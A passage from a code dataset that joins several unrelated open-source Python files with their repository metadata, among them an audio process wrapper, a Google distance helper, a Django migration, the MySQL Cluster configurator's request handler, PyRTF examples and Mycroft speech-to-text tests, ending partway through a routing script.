# the Free Software Foundation; either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program; if not, write to the #
# Free Software Foundation, Inc., #
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. #
###########################################################################
import os
import subprocess
class ProcessException (Exception):
pass
class Process:
"""Base class for runnable objects."""
def __init__ (self, cmdLine, debug = False):
"""Starts the process and returns a pipe to it."""
self.__cmdLine = cmdLine
self.__debug = debug
if debug:
print "Starting process: %s" % " ".join (self.__cmdLine)
self.process = subprocess.Popen (self.__cmdLine, stdin = subprocess.PIPE, stdout = subprocess.PIPE, stderr = subprocess.PIPE, bufsize = 1, close_fds = True)
if debug:
print "Process started successfully, pid = %d" % self.process.pid
def close (self):
assert (self.process)
self.process.stdin.close ()
self.process.stdout.close ()
ret = self.process.wait ()
if ret != 0:
raise ProcessException ("ERROR: Process returned %d" % ret)
elif self.__debug:
print "Process terminated correctly"
return ret
class DecoderProcess (Process):
def __init__ (self, cmdLine):
Process.__init__ (self, cmdLine)
def read (self, size):
assert (self.process)
return self.process.stdout.read (size)
# def preClose (self):
# self.process.stdin.close ()
class EncoderProcess (Process):
def __init__ (self, cmdLine):
Process.__init__ (self, cmdLine)
def write (self, str):
assert (self.process)
self.process.stdin.write (str)
# def preClose (self):
# self.process.stdout.close ()
|
SukkoPera/audiotrans
|
AudioTrans/Process.py
|
Python
|
gpl-3.0
| 2,826 | 0.023355 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import urllib
import time
import datetime
#From PatMap by Jason Young, available on GitHub at github.com/JasYoung314/PatMap
#Function to get distance between 2 points from google maps. By default route is by car, distance is given in miles and time in minutes.
def CalculateDistance(Origin = False,Destination = False, Method = "driving",TimeUnits = "Minutes",DistUnits = "Miles"):
#this is the start of a distnace matrix url
base = "https://maps.googleapis.com/maps/api/distancematrix/json?"
#Converts the variables to the required format
urlorigin = "origins=%s&".encode('utf-8') %(Origin)
urldestination = "destinations=%s&".encode('utf-8') %(Destination)
urlmethod = "mode=%s&" %(Method)
if DistUnits == "Kilometers" or DistUnits == "Meters":
urlunits = "units=metric&"
else:
urlunits = "units=imperial&"
#constructs the completed url
url = base.decode('utf-8') + urlorigin.decode('utf-8') + urldestination.decode('utf-8') + urlmethod.decode('utf-8') + urlunits.decode('utf-8') + "language=en-EN&sensor=false".decode('utf-8')
#Interprets the json data recieved
try:
result= json.load(urllib.urlopen(url))
except:
return 'ERROR','ERROR'
#Reads the status code and takes the appropriate action
if result["status"] == "OK":
if result["rows"][0]["elements"][0]["status"] == "OK":
time = result["rows"][0]["elements"][0]["duration"]["value"]
distance = result["rows"][0]["elements"][0]["distance"]["value"]
if TimeUnits == "Minutes":
time = time/60.0
elif TimeUnits == "Hours":
time = time/3600.0
if DistUnits == "Kilometres":
distance = distance/1000.0
elif DistUnits == "Yards":
distance = distance*1.0936133
elif DistUnits == "Miles":
distance = distance*0.000621371192
return time,distance
else:
return result["rows"][0]["elements"][0]["status"],result["rows"][0]["elements"][0]["status"]
else:
return result["status"]
|
MatthewGWilliams/Staff-Transport
|
emergencyTransport/RouteFinder/GoogleDistances.py
|
Python
|
mit
| 1,984 | 0.043851 |
# -*- coding: utf-8 -*-
from argparse import ArgumentParser
from ansible_playbook_wrapper.command.play import PlayCommand
def main():
parser = ArgumentParser()
sub_parsers = parser.add_subparsers(help='commands')
play_parser = sub_parsers.add_parser('play', help='play playbook')
for arg_info in PlayCommand.ARGUMENT_INFO:
play_parser.add_argument(*(arg_info[0]), **(arg_info[1]))
play_parser.set_defaults(command_class=PlayCommand)
parsed_args = parser.parse_args()
parsed_args.command_class(parsed_args).run()
|
succhiello/ansible-playbook-wrapper
|
ansible_playbook_wrapper/__init__.py
|
Python
|
mit
| 556 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('mainsite', '0005_auto_20150909_0246'),
]
operations = [
migrations.CreateModel(
name='EmailAddress',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),
('name', models.CharField(max_length=100)),
('email_address', models.CharField(max_length=200)),
],
),
migrations.RemoveField(
model_name='email',
name='customer',
),
migrations.RemoveField(
model_name='email',
name='location',
),
migrations.RenameField(
model_name='customer',
old_name='user',
new_name='owner',
),
migrations.RenameField(
model_name='location',
old_name='user',
new_name='owner',
),
migrations.RenameField(
model_name='session',
old_name='user',
new_name='owner',
),
migrations.RenameField(
model_name='sessiontype',
old_name='user',
new_name='owner',
),
migrations.AddField(
model_name='address',
name='owner',
field=models.ForeignKey(default=1, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AddField(
model_name='link',
name='owner',
field=models.ForeignKey(default=1, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AddField(
model_name='phone',
name='owner',
field=models.ForeignKey(default=1, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.DeleteModel(
name='Email',
),
migrations.AddField(
model_name='emailaddress',
name='customer',
field=models.ForeignKey(to='mainsite.Customer', null=True, blank=True),
),
migrations.AddField(
model_name='emailaddress',
name='location',
field=models.ForeignKey(to='mainsite.Location', null=True, blank=True),
),
migrations.AddField(
model_name='emailaddress',
name='owner',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
]
|
srenner/photerva
|
mainsite/migrations/0006_auto_20150916_0219.py
|
Python
|
apache-2.0
| 2,722 | 0.001102 |
# Copyright (c) 2012, 2013, Oracle and/or its affiliates. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0,
# as published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an additional
# permission to link the program and your derivative works with the
# separately licensed software that they have included with MySQL.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
The core of the configurator backend.
Implements the BaseHTTPRequestHandler that will process HTTP requests
received by the BaseHTTPServer to create the configurator backend web server.
Also contains functions and classes needed to implement the Json-based
communication protocol used to communicate with the frontend.
"""
import traceback
import SocketServer
import BaseHTTPServer
import json
import mimetypes
import pprint
import sys
import types
import ssl
import copy
import socket
import time
import os
import os.path
import logging
import optparse
import webbrowser
import zipfile
import tempfile
import threading
import random
import stat
import errno
import contextlib
import util
import config_parser
import mcc_config
from clusterhost import produce_ABClusterHost
_logger = logging.getLogger(__name__)
class ShutdownException(Exception):
"""Exception thrown when shutdown command arrives"""
pass
class ReplyJsonEncoder(json.JSONEncoder):
"""Specialized encoder for which will serialize the folliowing types,
in addition to those handled by JSONEncoder:
TypeTypes - as an html-friendly version their str() output
TracebackType - as a list of elements (returned by traceback.extrace_tb
Any class with the __dict__ attribute is serialized as a dict to a json object. """
def default(self, obj):
"""Overrides the default function in JSONEncoder. Specialized for TypeTypes,
TracebackTypes and dict-like types. All other types are passed to
JSONEncoder.default()."""
if isinstance(obj, types.TypeType):
return str(obj).replace('<','<').replace('>', '>')
if isinstance(obj, types.TracebackType):
return traceback.extract_tb(obj)
if hasattr(obj, '__dict__'):
assert isinstance(vars(obj), dict), str(type(obj)) + ' dict attr has type '+str(type(vars(obj)))
return vars(obj)
# Ordinary json serialization
return json.JSONEncoder.default(self, obj)
def handle_req(req):
"""Primary dispatcher function for messages from the client-frontend. Uses
introspection to look for a function named handle_<command name> and
invokes that to process the message.
req - incoming message (web server request) from the frontend
"""
h = globals()[ 'handle_'+req['head']['cmd']]
return h(req, req['body'])
def make_rep(req, body=None):
"""Utility which creates a reply object based on the headers in the request
object."""
rep = { 'head': { 'seq': req['head']['seq'] +1,
'cmd': req['head']['cmd'],
'rSeq': req['head']['seq'] }}
if body:
rep['body'] = body
return rep
def get_cred(body):
"""Get the credentials from the message in the form of a (user, pwd) tuple.
If there is no ssh object present, or keyBased is present and True, a
(None, None) tuple is returned."""
if not body.has_key('ssh') or util.get_val(body['ssh'], 'keyBased', False):
return (None, None)
return (body['ssh']['user'], body['ssh']['pwd'])
def handle_hostInfoReq(req, body):
"""Handler function for hostInfoReq commands. Will connect to the specified
host through a remote.ClusterHost object to retrieve information.
req - top level message object
body - shortcut to the body part of the message
"""
(user, pwd) = get_cred(body)
with produce_ABClusterHost(body['hostName'], user, pwd) as ch:
return make_rep(req, { 'host': {'name': ch.host },
'hostRes': {'ram':ch.ram,
'cores': ch.cores,
'uname': ch.hostInfo.uname,
'installdir': ch.installdir,
'datadir': ch.hostInfo.pm.join(ch.homedir, 'MySQL_Cluster') }})
def start_proc(proc, body):
"""Start individual process as specified in startClusterReq command.
proc - the process object in the message
body - the whole message
"""
f = proc['file']
(user, pwd) = get_cred(body)
with produce_ABClusterHost(f['hostName'], user, pwd) as ch:
pc = proc['procCtrl']
params = proc['params']
if f.has_key('autoComplete'):
if isinstance(f['autoComplete'], list):
executable = ch.auto_complete(f['path'], f['autoComplete'], f['name'])
else:
executable = ch.auto_complete(f['path'], ['bin', 'sbin', 'scripts', '', ch.path_module.join('..','scripts')], f['name'])
else:
executable = ch.path_module.join(f['path'], f['name'])
stdinFile = None
if f.has_key('stdinFile'):
assert (ch.file_exists(f['stdinFile'])), 'File ' + f['stdinFile'] + " does not exist on host " + ch.host
stdinFile = f['stdinFile']
_logger.debug('Attempting to launch '+executable+' on '+ch.host+
' with pc='+str(pc))
cmdv = util.params_to_cmdv(executable, params)
if proc.has_key('isCommand'):
return ch.execute_command(cmdv, stdinFile)
return ch.exec_cmdv(cmdv, pc, stdinFile)
def handle_executeCommandReq(req, body):
"""Handler function for execCommandReq messages. Runs the process specified in by the command property."""
if body['command'].has_key('isCommand'):
return make_rep(req, start_proc(body['command'], body))
return make_rep(req, {'out': start_proc(body['command'], body) })
def handle_createFileReq(req, body):
"""Handler function for createFileReq commands. Creates a file on the remote
host with content from the message.
req - top level message object
body - shortcut to the body part of the message
"""
(user, pwd) = get_cred(body)
f = body['file']
with produce_ABClusterHost(f['hostName'], user, pwd) as ch:
pathname = f['path']
if f.has_key('name'):
pathname = ch.path_module.join(f['path'], f['name'])
assert not (f.has_key('autoComplete') and f['autoComplete'])
assert not (not (f.has_key('overwrite') and f['overwrite']) and ch.file_exists(pathname)), 'File '+pathname+' already exists on host '+ch.host
ch.mkdir_p(f['path'])
with ch.open(pathname, 'w+') as rf:
rf.write(body['contentString'])
with ch.open(pathname) as rf:
assert rf.read() == body['contentString']
else:
ch.mkdir_p(f['path'])
_logger.debug('pathname ' + pathname + ' created')
return make_rep(req)
def handle_appendFileReq(req, body):
"""Handler function for appendFileReq commands. Opens two files on the remote
host, copies from source and appends to destination.
req - top level message object
body - shortcut to the body part of the message
"""
(user, pwd) = get_cred(body)
assert (body.has_key('sourceFile') and body.has_key('destinationFile'))
sf = body['sourceFile']
df = body['destinationFile']
assert (sf.has_key('path') and sf.has_key('name') and sf.has_key('hostName'))
assert (df.has_key('path') and df.has_key('name') and df.has_key('hostName'))
with produce_ABClusterHost(sf['hostName'], user, pwd) as ch:
sp = ch.path_module.join(sf['path'], sf['name'])
dp = ch.path_module.join(df['path'], df['name'])
assert (ch.file_exists(dp)), 'File ' + dp + ' does not exist on host ' + ch.host
content = None
with ch.open(sp) as sourceFile:
content = sourceFile.read()
assert (ch.file_exists(sp)), 'File ' + sp + ' does not exist on host ' + ch.host
with ch.open(dp, 'a+') as destinationFile:
destinationFile.write(content)
return make_rep(req)
def handle_shutdownServerReq(req, body):
"""x"""
if body.has_key('deathkey') and body['deathkey'] == deathkey:
raise ShutdownException("Shutdown request received")
time.sleep(util.get_val(body, 'sleeptime', 0))
return make_rep(req, 'incorrect death key')
def handle_getLogTailReq(req, body):
"""Handler function for getLogTailReq commands. Opens a file on the remote
host and adds content to reply
req - top level message object
body - shortcut to the body part of the message
"""
(user, pwd) = get_cred(body)
sf = body['logFile']
assert (sf.has_key('path') and sf.has_key('name') and sf.has_key('hostName'))
with produce_ABClusterHost(sf['hostName'], user, pwd) as ch:
sp = ch.path_module.join(sf['path'], sf['name'])
assert (ch.file_exists(sp)), 'File ' + sp + ' does not exist on host ' + ch.host
with ch.open(sp) as logFile:
return make_rep(req, {'tail': logFile.read()})
from util import _parse_until_delim, parse_properties
def parse_reply(ctx):
"""Return False unless ctx['str'] is an mgmd reply. Assign first line to ctx['reply_type], parse property list and return True otherwise."""
return _parse_until_delim(ctx, 'reply_type', '\n') and parse_properties(ctx,': ')
class mgmd_reply(dict):
def __init__(self, s=None):
if (s):
ctx = {'str': s, 'properties':self}
parse_reply(ctx)
self.reply_type = ctx['reply_type']
def __str__(self):
return self.reply_type+'\n'+'\n'.join(['{0}: {1}'.format(str(k), str(self[k])) for k in self.keys()])+'\n'
def handle_runMgmdCommandReq(req, body):
"""Handler function for runMgmdCommandReq commands. Opens a new connection to mgmd, sends command, parses reply and wraps reply in mcc Rep object."""
hostname = body['hostname'].encode('ascii', 'ignore')
port = body['port']
with util.socket_shutter(socket.create_connection((hostname, port))) as mgmd:
mgmd.sendall(body['mgmd_command']+'\n\n')
s = mgmd.recv(4096)
status = mgmd_reply(s)
sd = {}
for nk in status.keys():
if 'node.' in nk:
(x, n, k) = nk.split('.')
if not sd.has_key(n):
sd[n] = {}
sd[n][k] = status[nk]
return make_rep(req, { 'reply_type': status.reply_type, 'reply_properties':sd})
def handle_getConfigIni(req, body):
(user, pwd) = get_cred(body)
cf = body['configFile']
assert (cf.has_key('path') and cf.has_key('name') and cf.has_key('hostName'))
with produce_ABClusterHost(sf['hostName'], user, pwd) as ch:
sp = ch.path_module.join(sf['path'], sf['name'])
assert (ch.file_exists(sp)), 'File ' + sp + ' does not exist on host ' + ch.host
with ch.open(sp) as ini:
return make_rep(req, {'config': config_parser.parse_cluster_config_ini_(ini)})
def handle_getNdbConfig(req, body):
(user, pwd) = get_cred(body)
with produce_ABClusterHost(body['hostName'], user, pwd) as ch:
ndb_config = ch.path_module.join(body['installpath'], 'ndb_config')
return make_rep(req, { 'ndb_config': json.dumps(util.xml_to_python(ch.exec_cmdv([ndb_config, '--configinfo', '--xml']))) })
def log_thread_name():
"""Utility for dumping thread id in the log."""
cur_thread = threading.current_thread()
_logger.debug("cur_thread="+str(cur_thread.name))
class ConfiguratorHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handler class for web server requests to the configurator backend. To be
used with a BaseHTTPServer.HTTPServer to create a working server."""
def _send_as_json(self, obj):
self.send_response(200)
self.send_header('Content-type', 'text/json')
self.end_headers()
self.server.logger.debug('Will send: %s', json.dumps(obj, indent=2, cls=ReplyJsonEncoder))
json.dump(obj, self.wfile, cls=ReplyJsonEncoder)
def _do_file_req(self, rt):
"""Handles file requests. Attempts to guess
the MIME type and set the Content-Type accordingly."""
try:
log_thread_name()
if self.path == '/':
self.path = '/'+mcc_config.MCC_BROWSER_START_PAGE
self.server.logger.debug(rt+' fdir='+self.server.opts['fdir']+ " path="+os.path.normpath(self.path))
fn = os.path.join(self.server.opts['fdir'], os.path.normpath(self.path[1:]))
try:
os.stat(fn)
except OSError as ose:
self.server.logger.exception(rt + ' '+self.path+ ' failed')
if ose.errno == errno.ENOENT:
self.send_error(404, self.path+'=> file://'+ose.filename+' does not exist')
return
raise
self.send_response(200)
(ct, enc) = mimetypes.guess_type(self.path)
if (ct):
self.send_header('Content-type', ct)
if (enc):
self.send_header('Content-Encoding', enc)
self.end_headers()
if rt == 'GET':
with open(fn, "rb") as f:
self.wfile.write(f.read()+'\r\n\r\n')
except:
self.server.logger.exception(rt + ' '+self.path+ ' failed')
self.send_error(500,'Unexpected exception occured while processing: '+rt+' '+self.path+'\n'+traceback.format_exc()) # Some other number
def do_HEAD(self):
"""Handles HEAD requests by returning the headers without the body if file can be stated."""
self._do_file_req('HEAD')
def do_GET(self):
"""Handles GET requests by returning the specified file."""
self._do_file_req('GET')
def do_POST(self):
"""Handles POST requests, in the form of json-serialized command (request)
objects, from the frontend."""
log_thread_name()
try:
# Assume all post requests are json
assert 'application/json' in self.headers['Content-Type']
msg = json.loads(self.rfile.read(int(self.headers['Content-Length'])))
dbgmsg = copy.deepcopy(msg)
if (dbgmsg['body']['ssh'].has_key('pwd')):
dbgmsg['body']['ssh']['pwd'] = '*' * len(dbgmsg['body']['ssh']['pwd'])
self.server.logger.debug('--> ' + dbgmsg['head']['cmd'] + ':')
self.server.logger.debug(pprint.pformat(dbgmsg))
rep = make_rep(msg)
try:
rep = handle_req(msg)
except ShutdownException:
self.server.shutdown()
except:
#traceback.print_exc()
self.server.logger.exception('POST request failed:')
(etype, eobj, etb) = sys.exc_info()
rep['stat'] = {
'errMsg': util.html_rep(eobj),
'exType': etype,
'exObj': eobj,
'exTrace': etb }
self.server.logger.debug('<-- ' + rep['head']['cmd'] + ':')
self.server.logger.debug(pprint.pformat(rep))
self._send_as_json(rep)
except:
traceback.print_exc()
self.server.logger.critical('Internal server error:')
self.server.logger.exception('Unexpected exception:')
self.send_error(500, 'Server Exception\n'+traceback.format_exc()+'while processeing request:\n'+str(self.headers))
def log_message(self, fmt, *args):
"""Overrides the default implementation which logs to stderr"""
self.server.logger.info(msg=(fmt%args))
class ConfiguratorServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
"""Specialization of HTTPServer which adds ssl wrapping, shutdown on close and MT (by also inheriting SocketServer.ThreadingMixIn."""
def __init__(self, opts):
# Cannot use super() here, as BaseServer is not a new-style class
SocketServer.TCPServer.__init__(self, (opts['server'], opts['port']), ConfiguratorHandler)
self.opts = opts
self.logger = logging.getLogger(str(self.__class__))
def get_request(self):
"""Override get_request from SocketServer.TCPServer so that we can wrap
the socket in an ssl socket when using ssl."""
sock,addr = SocketServer.TCPServer.get_request(self)
if util.get_val(self.opts, 'ssl', False):
if self.opts['ca_certs']:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
ssl_sock = ssl.wrap_socket(sock, certfile=self.opts['certfile'], keyfile=self.opts['keyfile'],
cert_reqs=cert_reqs, ca_certs=self.opts['ca_certs'], server_side=True)
#self.logger.debug('ssl_sock.getpeercert()='+str(ssl_sock.getpeercert())
return ssl_sock, addr
return sock, addr
def close_request(self, request):
"""Override to make sure shutdown gets called on request socket."""
try:
request.shutdown(socket.SHUT_RDWR)
except:
pass
finally:
SocketServer.TCPServer.close_request(self, request)
configdir = None
basedir = None
deathkey = None
def main(prefix, cfgdir):
"""Server's main-function which parses the command line and starts up the server accordingly.
"""
global configdir
global basedir
configdir = cfgdir
basedir = prefix
frontend = os.path.join(cfgdir, 'frontend')
if not os.path.exists(os.path.join(frontend, 'dojo')):
dojoz = zipfile.ZipFile(os.path.join(frontend, 'dojo.zip'), 'r')
dojoz.extractall(path=frontend)
dojoz.close()
def_server_name = 'localhost'
if hasattr(webbrowser, 'WindowsDefault') and isinstance(webbrowser.get(), webbrowser.WindowsDefault):
# If on windows and using IE we do this to avoid IE9 bug (doesn't affect other versions of IE, there is no easy way to test
def_server_name = socket.gethostname()
cmdln_parser = optparse.OptionParser()
cmdln_parser.add_option('-N', '--server_name', action='store', type='string', default=def_server_name,
help='server name: [default: %default ]')
cmdln_parser.add_option('-p', '--port',
action='store', type='int', dest='port', default=8081,
help='port for the webserver: [default: %default]')
cmdln_parser.add_option('-n', '--no-browser', action='store_true',
help='do not open the server\'s start page in a browser.')
cmdln_parser.add_option('-s', '--browser-start-page', action='store', type='string',
dest='browser_start_page', default=mcc_config.MCC_BROWSER_START_PAGE,
help='start page for browser: [default: %default]')
cmdln_parser.add_option('-d', '--debug-level', action='store', type='string',
default='WARNING',
help='Python logging module debug level (DEBUG, INFO, WARNING, ERROR or CRITICAL). [default: %default]')
cmdln_parser.add_option('-o', '--server-log-file', action='store', type='string',
default=os.path.join(tempfile.gettempdir(),'ndb_setup-'+str(os.getpid())+'.log'),
help='log requests to this file. The value - means log to stderr: [default: %default]')
# option for level/logcfg file
cmdln_parser.add_option('-S', '--use-https', action='store_true', help='use https to secure communication with browser.')
cmdln_parser.add_option('-c', '--cert-file', action='store', type='string', default=os.path.join(cfgdir, 'cfg.pem'), help='file containing X509 certificate which identifies the server (possibly self-signed): [default: %default]')
cmdln_parser.add_option('-k', '--key-file', action='store', type='string', help='file containing private key when if not included in cert-file: [default: %default]')
cmdln_parser.add_option('-a', '--ca-certs-file', action='store', type='string', help='file containing list of client certificates allowed to connect to the server [default: %default (no client authentication)]')
(options, arguments) = cmdln_parser.parse_args()
dbglvl = getattr(logging, options.debug_level, logging.DEBUG)
fmt = '%(asctime)s: %(levelname)s [%(funcName)s;%(filename)s:%(lineno)d]: %(message)s '
if options.server_log_file == '-':
logging.basicConfig(level=dbglvl, format=fmt)
else:
logging.basicConfig(level=dbglvl, format=fmt, filename=options.server_log_file)
srvopts = { 'server' : options.server_name,
'port': options.port,
'cdir': cfgdir,
'fdir': os.path.join(cfgdir, 'frontend') }
if options.use_https:
srvopts['ssl'] = True
srvopts['certfile'] = options.cert_file
srvopts['keyfile'] = options.key_file
srvopts['ca_certs'] = options.ca_certs_file
print 'Starting web server on port ' + repr(options.port)
url_host = options.server_name
if url_host == '':
url_host = 'localhost'
if options.use_https:
url = 'https://{0}:{opt.port}/{opt.browser_start_page}'.format(url_host, opt=options)
else:
url = 'http://{0}:{opt.port}/{opt.browser_start_page}'.format(url_host, opt=options)
httpsrv = None
global deathkey
deathkey = random.randint(100000, 1000000)
print 'deathkey='+str(deathkey)
# dkf = open('deathkey.txt','w')
# dkf.write(str(deathkey))
# dkf.close()
# os.chmod('deathkey.txt', stat.S_IRUSR)
try:
httpsrv = ConfiguratorServer(srvopts)
if not options.no_browser:
try:
webbrowser.open_new(url)
except:
logging.exception('Failed to control browser: ')
print 'Could not control your browser. Try to opening '+url+' to launch the application.'
else:
print 'The application should now be running in your browser.\n(Alternatively you can navigate to '+url+' to start it)'
else:
print 'Navigate to '+url+' to launch the application.'
httpsrv.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down web server'
except:
traceback.print_exc()
finally:
if httpsrv:
httpsrv.socket.close()
#os.remove('deathkey.txt')
|
greenlion/mysql-server
|
storage/ndb/mcc/request_handler.py
|
Python
|
gpl-2.0
| 23,716 | 0.009529 |
import os
import sys
sys.path.append( '../' )
from PyRTF import *
def MakeExample1() :
doc = Document()
ss = doc.StyleSheet
section = Section()
doc.Sections.append( section )
# text can be added directly to the section
# a paragraph object is create as needed
section.append( 'Image Example 1' )
section.append( 'You can add images in one of two ways, either converting the '
'image each and every time like;' )
image = Image( 'image.jpg' )
section.append( Paragraph( image ) )
section.append( 'Or you can use the image object to convert the image and then '
'save it to a raw code element that can be included later.' )
fout = file( 'image_tmp.py', 'w' )
print >> fout, 'from PyRTF import RawCode'
print >> fout
fout.write( image.ToRawCode( 'TEST_IMAGE' ) )
fout.close()
import image_tmp
section.append( Paragraph( image_tmp.TEST_IMAGE ) )
section.append( 'Have a look in image_tmp.py for the converted RawCode.' )
section.append( 'here are some png files' )
for f in [ 'img1.png',
'img2.png',
'img3.png',
'img4.png' ] :
section.append( Paragraph( Image( f ) ) )
return doc
def OpenFile( name ) :
return file( '%s.rtf' % name, 'w' )
if __name__ == '__main__' :
DR = Renderer()
doc1 = MakeExample1()
DR.Write( doc1, OpenFile( 'Image1' ) )
print "Finished"
|
lambdamusic/testproject
|
konproj/libs/PyRTF/examples/examples2.py
|
Python
|
gpl-2.0
| 1,338 | 0.076233 |
blah = 33
|
sjdv1982/seamless
|
seamless/graphs/multi_module/mytestpackage/mod4.py
|
Python
|
mit
| 10 | 0 |
import mock
import unittest
import mycroft.stt
from mycroft.configuration import ConfigurationManager
class TestSTT(unittest.TestCase):
@mock.patch.object(ConfigurationManager, 'get')
def test_factory(self, mock_get):
mycroft.stt.STTApi = mock.MagicMock()
config = {'stt': {
'module': 'mycroft',
'wit': {'credential': {'token': 'FOOBAR'}},
'google': {'credential': {'token': 'FOOBAR'}},
'ibm': {'credential': {'token': 'FOOBAR'}},
'kaldi': {'uri': 'https://test.com'},
'mycroft': {'uri': 'https://test.com'}
},
'lang': 'en-US'
}
mock_get.return_value = config
stt = mycroft.stt.STTFactory.create()
self.assertEquals(type(stt), mycroft.stt.MycroftSTT)
config['stt']['module'] = 'google'
stt = mycroft.stt.STTFactory.create()
self.assertEquals(type(stt), mycroft.stt.GoogleSTT)
config['stt']['module'] = 'ibm'
stt = mycroft.stt.STTFactory.create()
self.assertEquals(type(stt), mycroft.stt.IBMSTT)
config['stt']['module'] = 'kaldi'
stt = mycroft.stt.STTFactory.create()
self.assertEquals(type(stt), mycroft.stt.KaldiSTT)
config['stt']['module'] = 'wit'
stt = mycroft.stt.STTFactory.create()
self.assertEquals(type(stt), mycroft.stt.WITSTT)
@mock.patch.object(ConfigurationManager, 'get')
def test_stt(self, mock_get):
mycroft.stt.STTApi = mock.MagicMock()
config = {'stt': {
'module': 'mycroft',
'mycroft': {'uri': 'https://test.com'}
},
'lang': 'en-US'
}
mock_get.return_value = config
class TestSTT(mycroft.stt.STT):
def execute(self, audio, language=None):
pass
stt = TestSTT()
self.assertEqual(stt.lang, 'en-US')
config['lang'] = 'en-us'
# Check that second part of lang gets capitalized
stt = TestSTT()
self.assertEqual(stt.lang, 'en-US')
# Check that it works with two letters
config['lang'] = 'sv'
stt = TestSTT()
self.assertEqual(stt.lang, 'sv')
@mock.patch.object(ConfigurationManager, 'get')
def test_mycroft_stt(self, mock_get):
mycroft.stt.STTApi = mock.MagicMock()
config = {'stt': {
'module': 'mycroft',
'mycroft': {'uri': 'https://test.com'}
},
'lang': 'en-US'
}
mock_get.return_value = config
stt = mycroft.stt.MycroftSTT()
audio = mock.MagicMock()
stt.execute(audio, 'en-us')
self.assertTrue(mycroft.stt.STTApi.called)
@mock.patch.object(ConfigurationManager, 'get')
def test_google_stt(self, mock_get):
mycroft.stt.Recognizer = mock.MagicMock
config = {'stt': {
'module': 'google',
'google': {'credential': {'token': 'FOOBAR'}},
},
"lang": "en-US"
}
mock_get.return_value = config
audio = mock.MagicMock()
stt = mycroft.stt.GoogleSTT()
stt.execute(audio)
self.assertTrue(stt.recognizer.recognize_google.called)
@mock.patch.object(ConfigurationManager, 'get')
def test_ibm_stt(self, mock_get):
mycroft.stt.Recognizer = mock.MagicMock
config = {'stt': {
'module': 'ibm',
'ibm': {'credential': {'token': 'FOOBAR'}},
},
"lang": "en-US"
}
mock_get.return_value = config
audio = mock.MagicMock()
stt = mycroft.stt.IBMSTT()
stt.execute(audio)
self.assertTrue(stt.recognizer.recognize_ibm.called)
@mock.patch.object(ConfigurationManager, 'get')
def test_wit_stt(self, mock_get):
mycroft.stt.Recognizer = mock.MagicMock
config = {'stt': {
'module': 'wit',
'wit': {'credential': {'token': 'FOOBAR'}},
},
"lang": "en-US"
}
mock_get.return_value = config
audio = mock.MagicMock()
stt = mycroft.stt.WITSTT()
stt.execute(audio)
self.assertTrue(stt.recognizer.recognize_wit.called)
@mock.patch('mycroft.stt.post')
@mock.patch.object(ConfigurationManager, 'get')
def test_kaldi_stt(self, mock_get, mock_post):
mycroft.stt.Recognizer = mock.MagicMock
config = {'stt': {
'module': 'kaldi',
'kaldi': {'uri': 'https://test.com'},
},
"lang": "en-US"
}
mock_get.return_value = config
kaldiResponse = mock.MagicMock()
kaldiResponse.json.return_value = {
'hypotheses': [{'utterance': ' [noise] text'},
{'utterance': ' asdf'}]
}
mock_post.return_value = kaldiResponse
audio = mock.MagicMock()
stt = mycroft.stt.KaldiSTT()
self.assertEquals(stt.execute(audio), 'text')
|
epaglier/Project-JARVIS
|
mycroft-core/test/unittests/stt/test_stt.py
|
Python
|
gpl-3.0
| 5,110 | 0 |
import sys
n, m = map(int, raw_input().strip().split())
v1, v2 = map(int, raw_input().strip().split())
x, y = map(int, raw_input().strip().split())
route_map = {}
distance_map = {}
def get_edge_name(x, y):
if x > y:
x, y = y, x
return str(x) + '_' + str(y)
def get_edge_distance(x,y):
edge_name = get_edge_name(x,y)
if edge_name not in distance_map:
return 0
else:
return distance_map[edge_name][0]
def bike_allowed(x,y):
edge_name = get_edge_name(x,y)
if edge_name in distance_map:
return distance_map[edge_name][1]
else:
return -1
for _ in xrange(m):
r1, r2, d1, b1 = map(int, raw_input().strip().split())
route_map[r1] = route_map.get(r1, [])
route_map[r1].append(r2)
route_map[r2] = route_map.get(r2, [])
route_map[r2].append(r1)
distance_map[get_edge_name(r1, r2)] = [d1, b1]
def get_min_bike_time(x, y, dist_acc=0, visited_nodes=[]):
if x not in route_map or x == y:
return sys.maxsize
visited_nodes.append(x)
dist_direct = sys.maxsize
if y in route_map[x] and bike_allowed(x,y) == 0:
dist_direct = dist_acc + get_edge_distance(x,y)
if True:
dist = [dist_direct]
for elem in route_map[x]:
if bike_allowed(x, elem) == 0 and elem not in visited_nodes:
dist.append(get_min_bike_time(elem, y, dist_acc + get_edge_distance(x, elem), visited_nodes))
else:
continue
return (min(dist) if len(dist) else sys.maxsize)
def get_min_cycle_time(x, y, dist_acc=0, visited_nodes=[]):
if x not in route_map or x == y:
return sys.maxsize
visited_nodes.append(x)
dist_direct = sys.maxsize
if y in route_map[x]:
